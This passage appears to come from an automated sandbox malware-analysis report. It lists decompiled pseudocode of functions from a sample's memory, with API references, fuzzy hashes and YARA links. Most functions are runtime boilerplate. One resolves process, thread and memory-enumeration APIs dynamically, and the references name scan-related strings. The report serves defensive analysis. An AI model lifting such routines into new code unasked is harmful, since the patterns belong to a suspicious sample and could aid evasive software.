                                                                                                • API String ID: 2987862817-0
                                                                                                • Opcode ID: fea19e74a33cc40effd3ea6e0c5e09613c53f4b24be960bb8947d20957c1216f
                                                                                                • Instruction ID: 49dd5880103dbe1a35a907c0d6870214da0e0b632acefe5e1a39c71ed3301cdd
                                                                                                • Opcode Fuzzy Hash: fea19e74a33cc40effd3ea6e0c5e09613c53f4b24be960bb8947d20957c1216f
                                                                                                • Instruction Fuzzy Hash: 08F08270654744BFEB115F75CC5182BBBFDE789B5075248B1F801D2650E7394810C960
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0217CAC8 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 34%
                                                                                                			E0217CAC8(void* __eax, void* __ebx, int __edx) {
				struct HINSTANCE__* _v12;
				int _v16;
				int _t4;
				void* _t12;
				intOrPtr _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;

				_t18 = _t19;
				_t20 = _t19 + 0xfffffff4;
				_t12 = __eax;
				_t4 = SetErrorMode(__edx); // executed
				_v16 = _t4;
				_push(_t18);
				_push(0x217cb3a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				asm("fnstcw word [ebp-0x2]");
				_push(_t18);
				_push(0x217cb1c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				_v12 = LoadLibraryA(E02174D64(_t12));
				_pop(_t16);
				 *[fs:eax] = _t16;
				_push(E0217CB23);
				asm("fclex");
				asm("fldcw word [ebp-0x2]");
				return 0;
			}











                                                                                                0x0217cac9
                                                                                                0x0217cacb
                                                                                                0x0217cacf
                                                                                                0x0217cad2
                                                                                                0x0217cad7
                                                                                                0x0217cadc
                                                                                                0x0217cadd
                                                                                                0x0217cae2
                                                                                                0x0217cae5
                                                                                                0x0217cae8
                                                                                                0x0217caed
                                                                                                0x0217caee
                                                                                                0x0217caf3
                                                                                                0x0217caf6
                                                                                                0x0217cb06
                                                                                                0x0217cb0b
                                                                                                0x0217cb0e
                                                                                                0x0217cb11
                                                                                                0x0217cb16
                                                                                                0x0217cb18
                                                                                                0x0217cb1b

                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32 ref: 0217CAD2
                                                                                                • LoadLibraryA.KERNEL32(00000000,00000000,0217CB1C,?,00000000,0217CB3A), ref: 0217CB01
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLibraryLoadMode
                                                                                                • String ID:
                                                                                                • API String ID: 2987862817-0
                                                                                                • Opcode ID: df94ad116ebcaa672ce793ff816d76859a309ad176ddeb8ba2e999a39403c04a
                                                                                                • Instruction ID: b848cba1c70743bc20ec0825f0abe35c6753bfcbc0a23ad1abd7e674e4792b91
                                                                                                • Opcode Fuzzy Hash: df94ad116ebcaa672ce793ff816d76859a309ad176ddeb8ba2e999a39403c04a
                                                                                                • Instruction Fuzzy Hash: 69F0A770654744BFEB115F75CC5182BBBFDE78DB5075348B1F80193650E7394810C960
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02175AA8 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E02175AA8(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				CHAR* _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x2170000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E02175D0C(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0x2170000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				_t7 = _t16 + 0x10; // 0x2170000
				return  *_t7;
			}








                                                                                                0x02175ab0
                                                                                                0x02175ab6
                                                                                                0x02175ac2
                                                                                                0x02175ac6
                                                                                                0x02175acf
                                                                                                0x02175ad4
                                                                                                0x02175ad6
                                                                                                0x02175adb
                                                                                                0x02175add
                                                                                                0x02175ae0
                                                                                                0x02175ae0
                                                                                                0x02175adb
                                                                                                0x02175ae3
                                                                                                0x02175aee

                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(02170000,?,00000105), ref: 02175AC6
                                                                                                  • Part of subcall function 02175D0C: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02170000,021907B4), ref: 02175D28
                                                                                                  • Part of subcall function 02175D0C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02170000,021907B4), ref: 02175D46
                                                                                                  • Part of subcall function 02175D0C: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02170000,021907B4), ref: 02175D64
                                                                                                  • Part of subcall function 02175D0C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02175D82
                                                                                                  • Part of subcall function 02175D0C: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02175E11,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02175DCB
                                                                                                  • Part of subcall function 02175D0C: RegQueryValueExA.ADVAPI32(?,02175F78,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02175E11,?,80000001), ref: 02175DE9
                                                                                                  • Part of subcall function 02175D0C: RegCloseKey.ADVAPI32(?,02175E18,00000000,?,?,00000000,02175E11,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02175E0B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                • String ID:
                                                                                                • API String ID: 2796650324-0
                                                                                                • Opcode ID: 47e13ebab32659183f83e9484014392e770a5945ea1bfc9bf7870af31faf625a
                                                                                                • Instruction ID: 7a201efa8caa1a3654b5475515044a7bee8ae39ebecb80e3f19bf4bcfc14d399
                                                                                                • Opcode Fuzzy Hash: 47e13ebab32659183f83e9484014392e770a5945ea1bfc9bf7870af31faf625a
                                                                                                • Instruction Fuzzy Hash: 63E06D71A40214AFCB10DE58C8C1B4777E9AB48750F400661EC58CF246D3B1D9148BD0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0217807C Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 75%
                                                                                                			E0217807C(void* __eax, long __ecx, void* __edx) {
				long _v16;
				int _t4;

				_push(__ecx);
				_t4 = WriteFile(__eax, __edx, __ecx,  &_v16, 0); // executed
				if(_t4 == 0) {
					_v16 = 0xffffffff;
				}
				return _v16;
			}





                                                                                                0x0217807f
                                                                                                0x02178090
                                                                                                0x02178097
                                                                                                0x02178099
                                                                                                0x02178099
                                                                                                0x021780a7

                                                                                                APIs
                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02178090
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3934441357-0
                                                                                                • Opcode ID: 245f9e59dba5418514fab60bbf667c473568b506f2f627899943ec5f0ff1d88a
                                                                                                • Instruction ID: e27e742800a50f4cc9e112830b3babbd221be575d513a862cb253cb12c93ecdd
                                                                                                • Opcode Fuzzy Hash: 245f9e59dba5418514fab60bbf667c473568b506f2f627899943ec5f0ff1d88a
                                                                                                • Instruction Fuzzy Hash: 1AD05B723081507FD324956A5D44EA79BECDBC5771F11073DF558C3180D7208C0586B1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 021780F8 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E021780F8(void* __eax) {
				signed char _t5;

				_t5 = GetFileAttributesA(E02174D64(__eax)); // executed
				if(_t5 == 0xffffffff || (_t5 & 0x00000010) != 0) {
					return 0;
				} else {
					return 1;
				}
			}




                                                                                                0x02178103
                                                                                                0x0217810b
                                                                                                0x02178114
                                                                                                0x02178115
                                                                                                0x02178118
                                                                                                0x02178118

                                                                                                APIs
                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,02189493,ScanString,0218E77C,OpenSession,0218E77C,Initialize,0218E77C,ScanBuffer,0218E77C,Initialize,0218E77C,ScanString,0218E77C,OpenSession), ref: 02178103
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID:
                                                                                                • API String ID: 3188754299-0
                                                                                                • Opcode ID: b5b9d6dd6696097a2bfe1c09360b8a481e568112e44ccac4018eab4fc1ad6852
                                                                                                • Instruction ID: cea692c5bd633206df280d0e0579e372b7b769a4c096fe88aa0965c3832d574c
                                                                                                • Opcode Fuzzy Hash: b5b9d6dd6696097a2bfe1c09360b8a481e568112e44ccac4018eab4fc1ad6852
                                                                                                • Instruction Fuzzy Hash: 39C08CA17C17000E1A2061BC0CCD04A02A84AC533C3251B71E468C22D1D32280173810
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0217811C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0217811C(void* __eax) {
				signed char _t5;

				_t5 = GetFileAttributesA(E02174D64(__eax)); // executed
				if(_t5 == 0xffffffff || (_t5 & 0x00000010) == 0) {
					return 0;
				} else {
					return 1;
				}
			}




                                                                                                0x02178127
                                                                                                0x0217812f
                                                                                                0x02178138
                                                                                                0x02178139
                                                                                                0x0217813c
                                                                                                0x0217813c

                                                                                                APIs
                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,0218A7E7,ScanString,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,Initialize,0218E77C,ScanString,0218E77C,OpenSession), ref: 02178127
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID:
                                                                                                • API String ID: 3188754299-0
                                                                                                • Opcode ID: 7aa809ac683ca359162f2dab0b6a023e9aae3b17d92952908ee79872cec2aff8
                                                                                                • Instruction ID: 02b46bb4854b97452b2dd0292b6ffb8afbd32c177d2b0d25f90a7b2837e060bf
                                                                                                • Opcode Fuzzy Hash: 7aa809ac683ca359162f2dab0b6a023e9aae3b17d92952908ee79872cec2aff8
                                                                                                • Instruction Fuzzy Hash: 4FC08CA02C17000E1E2065BC1CC824902A94AC62B8B201B65E068C25C1D31280263811
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0218EC48 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0218EC48(int __eax) {
				int _t3;

				_t3 = timeSetEvent(__eax, 0, E0218EC3C, 0, 1); // executed
				 *0x2194b6c = _t3;
				return _t3;
			}




                                                                                                0x0218ec58
                                                                                                0x0218ec5d
                                                                                                0x0218ec63

                                                                                                APIs
                                                                                                • timeSetEvent.WINMM(00002710,00000000,0218EC3C,00000000,00000001), ref: 0218EC58
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: Eventtime
                                                                                                • String ID:
                                                                                                • API String ID: 2982266575-0
                                                                                                • Opcode ID: 9050b651c6649772b4e3eacbedce6b44b35c4d05447f2955b3efe35a352c9579
                                                                                                • Instruction ID: faff90d72d27943b53bdd6034b4f73c51def54a3f4888c6134081756de6fbfc7
                                                                                                • Opcode Fuzzy Hash: 9050b651c6649772b4e3eacbedce6b44b35c4d05447f2955b3efe35a352c9579
                                                                                                • Instruction Fuzzy Hash: 50C092F0BD03043EFA20B6A95ED2F2B59ADD788B10F101412B701EE2C2D3E649518E64
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0217CB23 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 50%
                                                                                                			E0217CB23() {
				int _t4;
				intOrPtr _t7;
				void* _t8;

				_pop(_t7);
				 *[fs:eax] = _t7;
				_push(E0217CB41);
				_t4 = SetErrorMode( *(_t8 - 0xc)); // executed
				return _t4;
			}






                                                                                                0x0217cb25
                                                                                                0x0217cb28
                                                                                                0x0217cb2b
                                                                                                0x0217cb34
                                                                                                0x0217cb39

                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(?,0217CB41), ref: 0217CB34
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode
                                                                                                • String ID:
                                                                                                • API String ID: 2340568224-0
                                                                                                • Opcode ID: b8cbe638764f5d3c9aae71dcc30a8a9b130325849af8cdb89aead0b5ef26907b
                                                                                                • Instruction ID: 71725db478cbaa8a1e062199897d3d871edf706b14ae9c913a2b5fbed2188ccf
                                                                                                • Opcode Fuzzy Hash: b8cbe638764f5d3c9aae71dcc30a8a9b130325849af8cdb89aead0b5ef26907b
                                                                                                • Instruction Fuzzy Hash: 02B09B76E4C6405DF7199A946511418E3F8D7C47103A14476F400C3540D63855004554
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0217CB3F Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0217CB3F() {
				int _t3;
				void* _t4;

				_t3 = SetErrorMode( *(_t4 - 0xc)); // executed
				return _t3;
			}





                                                                                                0x0217cb34
                                                                                                0x0217cb39

                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(?,0217CB41), ref: 0217CB34
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode
                                                                                                • String ID:
                                                                                                • API String ID: 2340568224-0
                                                                                                • Opcode ID: 29f3143b9f21cd1f6a7bf33cda2c225a70341c89d61cb57981f0070d52900ebd
                                                                                                • Instruction ID: 058e43fafd453e111982820a1a1512db24e186317cd9241baaa2c3be341306d5
                                                                                                • Opcode Fuzzy Hash: 29f3143b9f21cd1f6a7bf33cda2c225a70341c89d61cb57981f0070d52900ebd
                                                                                                • Instruction Fuzzy Hash: DDA00269D94544BECE28BAE4956485DA37DAFC83407C14891752593000C73D95008A90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 021715FC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E021715FC(signed int __eax) {
				void* _t4;
				intOrPtr _t7;
				signed int _t8;
				void* _t10;
				void** _t15;
				void* _t17;

				_t8 = __eax;
				E02171590(__eax);
				_t4 = VirtualAlloc(0, 0x140000, 0x1000, 4); // executed
				if(_t4 == 0) {
					 *0x2191718 = 0;
					return 0;
				} else {
					_t15 =  *0x2191704; // 0x4a30000
					_t10 = _t4;
					 *_t10 = 0x2191700;
					 *0x2191704 = _t4;
					 *(_t10 + 4) = _t15;
					 *_t15 = _t4;
					_t17 = _t4 + 0x140000;
					 *((intOrPtr*)(_t17 - 4)) = 2;
					 *0x2191718 = 0x13fff0 - _t8;
					_t7 = _t17 - _t8;
					 *0x2191714 = _t7;
					 *(_t7 - 4) = _t8 | 0x00000002;
					return _t7;
				}
			}









                                                                                                0x021715fd
                                                                                                0x021715ff
                                                                                                0x02171612
                                                                                                0x02171619
                                                                                                0x0217166a
                                                                                                0x02171672
                                                                                                0x0217161b
                                                                                                0x0217161b
                                                                                                0x02171621
                                                                                                0x02171623
                                                                                                0x02171629
                                                                                                0x0217162e
                                                                                                0x02171631
                                                                                                0x02171635
                                                                                                0x02171640
                                                                                                0x0217164d
                                                                                                0x02171655
                                                                                                0x02171657
                                                                                                0x02171664
                                                                                                0x02171667
                                                                                                0x02171667

                                                                                                APIs
                                                                                                • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02171A33), ref: 02171612
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: 36be75aac4a3f02638c05837875eebfdf9175de786c69a98b72e17530f28471f
                                                                                                • Instruction ID: 9769a6e53952f79335244d18ea040e0072ce7234917c5676f76a15f83b579674
                                                                                                • Opcode Fuzzy Hash: 36be75aac4a3f02638c05837875eebfdf9175de786c69a98b72e17530f28471f
                                                                                                • Instruction Fuzzy Hash: 7CF06DF0B813026FDB0ACF799A803127AE3F789345F208479E20DDB388E77284818B40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 021716B2 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E021716B2(intOrPtr __eax) {
				void* _t6;
				void** _t9;
				void* _t11;
				void* _t15;
				long _t20;
				intOrPtr _t24;

				_t24 = __eax;
				_t20 = __eax + 0x00010010 - 0x00000001 + 0x00000004 & 0xffff0000;
				_t6 = VirtualAlloc(0, _t20, 0x101000, 4); // executed
				_t11 = _t6;
				if(_t11 != 0) {
					_t15 = _t11;
					 *((intOrPtr*)(_t15 + 8)) = _t24;
					 *(_t15 + 0xc) = _t20 | 0x00000004;
					E02171674();
					_t9 =  *0x21937a8; // 0x7f9f0000
					 *_t15 = 0x21937a4;
					 *0x21937a8 = _t11;
					 *(_t15 + 4) = _t9;
					 *_t9 = _t11;
					 *0x21937a0 = 0;
					_t11 = _t11 + 0x10;
				}
				return _t11;
			}









                                                                                                0x021716b8
                                                                                                0x021716c4
                                                                                                0x021716d4
                                                                                                0x021716d9
                                                                                                0x021716dd
                                                                                                0x021716df
                                                                                                0x021716e1
                                                                                                0x021716e7
                                                                                                0x021716ea
                                                                                                0x021716ef
                                                                                                0x021716f4
                                                                                                0x021716fa
                                                                                                0x02171700
                                                                                                0x02171703
                                                                                                0x02171705
                                                                                                0x0217170c
                                                                                                0x0217170c
                                                                                                0x02171715

                                                                                                APIs
                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 021716D4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: 6a63c44ca20e0b67d6b42182f9a758b6e74fd273ac283d4406b458d3ad4df670
                                                                                                • Instruction ID: cb69735f927b78cb900bebbc099e39d8f55c45b65827fe74685eadd4bed36596
                                                                                                • Opcode Fuzzy Hash: 6a63c44ca20e0b67d6b42182f9a758b6e74fd273ac283d4406b458d3ad4df670
                                                                                                • Instruction Fuzzy Hash: 0DF067F2A806957FD7109E9A9C80B83BBE4FB44321F510179EA18D7340D7B1A851CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02171716 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E02171716(void* __eax) {
				void* _t5;
				signed int _t6;
				signed int _t7;
				void* _t10;
				void* _t13;
				void _t16;

				_t10 = __eax - 0x10;
				E02171674();
				_t5 = _t10;
				_t16 =  *_t5;
				_t13 =  *(_t5 + 4);
				_t6 = VirtualFree(_t10, 0, 0x8000); // executed
				if(_t6 == 0) {
					_t7 = _t6 | 0xffffffff;
				} else {
					 *_t13 = _t16;
					 *(_t16 + 4) = _t13;
					_t7 = 0;
				}
				 *0x21937a0 = 0;
				return _t7;
			}









                                                                                                0x0217171d
                                                                                                0x02171720
                                                                                                0x02171725
                                                                                                0x02171727
                                                                                                0x02171729
                                                                                                0x02171734
                                                                                                0x0217173b
                                                                                                0x02171746
                                                                                                0x0217173d
                                                                                                0x0217173d
                                                                                                0x0217173f
                                                                                                0x02171742
                                                                                                0x02171742
                                                                                                0x02171749
                                                                                                0x02171753

                                                                                                APIs
                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02171734
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 1263568516-0
                                                                                                • Opcode ID: 46bdf2f33713a27f3391fe62cc3479306ca00a7fdfe2610301c26b9a82010347
                                                                                                • Instruction ID: 7e9c1cfb627e5fdffaa370dd7d46a1333220cd8f26cd70c2cad0a43ab08ce225
                                                                                                • Opcode Fuzzy Hash: 46bdf2f33713a27f3391fe62cc3479306ca00a7fdfe2610301c26b9a82010347
                                                                                                • Instruction Fuzzy Hash: 2EE086B53803017FD7105ABA5D44B126BECEB99650F144475F509DB251D370E8048B60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                Function 021854F4 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E021854F4() {

				if( *0x219448c == 0) {
					 *0x219448c = GetModuleHandleA("kernel32.dll");
					if( *0x219448c != 0) {
						 *0x2194490 = GetProcAddress( *0x219448c, "CreateToolhelp32Snapshot");
						 *0x2194494 = GetProcAddress( *0x219448c, "Heap32ListFirst");
						 *0x2194498 = GetProcAddress( *0x219448c, "Heap32ListNext");
						 *0x219449c = GetProcAddress( *0x219448c, "Heap32First");
						 *0x21944a0 = GetProcAddress( *0x219448c, "Heap32Next");
						 *0x21944a4 = GetProcAddress( *0x219448c, "Toolhelp32ReadProcessMemory");
						 *0x21944a8 = GetProcAddress( *0x219448c, "Process32First");
						 *0x21944ac = GetProcAddress( *0x219448c, "Process32Next");
						 *0x21944b0 = GetProcAddress( *0x219448c, "Process32FirstW");
						 *0x21944b4 = GetProcAddress( *0x219448c, "Process32NextW");
						 *0x21944b8 = GetProcAddress( *0x219448c, "Thread32First");
						 *0x21944bc = GetProcAddress( *0x219448c, "Thread32Next");
						 *0x21944c0 = GetProcAddress( *0x219448c, "Module32First");
						 *0x21944c4 = GetProcAddress( *0x219448c, "Module32Next");
						 *0x21944c8 = GetProcAddress( *0x219448c, "Module32FirstW");
						 *0x21944cc = GetProcAddress( *0x219448c, "Module32NextW");
					}
				}
				if( *0x219448c == 0 ||  *0x2194490 == 0) {
					return 0;
				} else {
					return 1;
				}
			}



                                                                                                0x021854fd
                                                                                                0x0218550d
                                                                                                0x02185512
                                                                                                0x02185525
                                                                                                0x02185537
                                                                                                0x02185549
                                                                                                0x0218555b
                                                                                                0x0218556d
                                                                                                0x0218557f
                                                                                                0x02185591
                                                                                                0x021855a3
                                                                                                0x021855b5
                                                                                                0x021855c7
                                                                                                0x021855d9
                                                                                                0x021855eb
                                                                                                0x021855fd
                                                                                                0x0218560f
                                                                                                0x02185621
                                                                                                0x02185633
                                                                                                0x02185633
                                                                                                0x02185512
                                                                                                0x0218563b
                                                                                                0x02185649
                                                                                                0x0218564a
                                                                                                0x0218564d
                                                                                                0x0218564d

                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0218577B,?,?,0218580D,00000000,021858E9), ref: 02185508
                                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02185520
                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02185532
                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02185544
                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02185556
                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02185568
                                                                                                • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0218557A
                                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0218558C
                                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0218559E
                                                                                                • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 021855B0
                                                                                                • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 021855C2
                                                                                                • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 021855D4
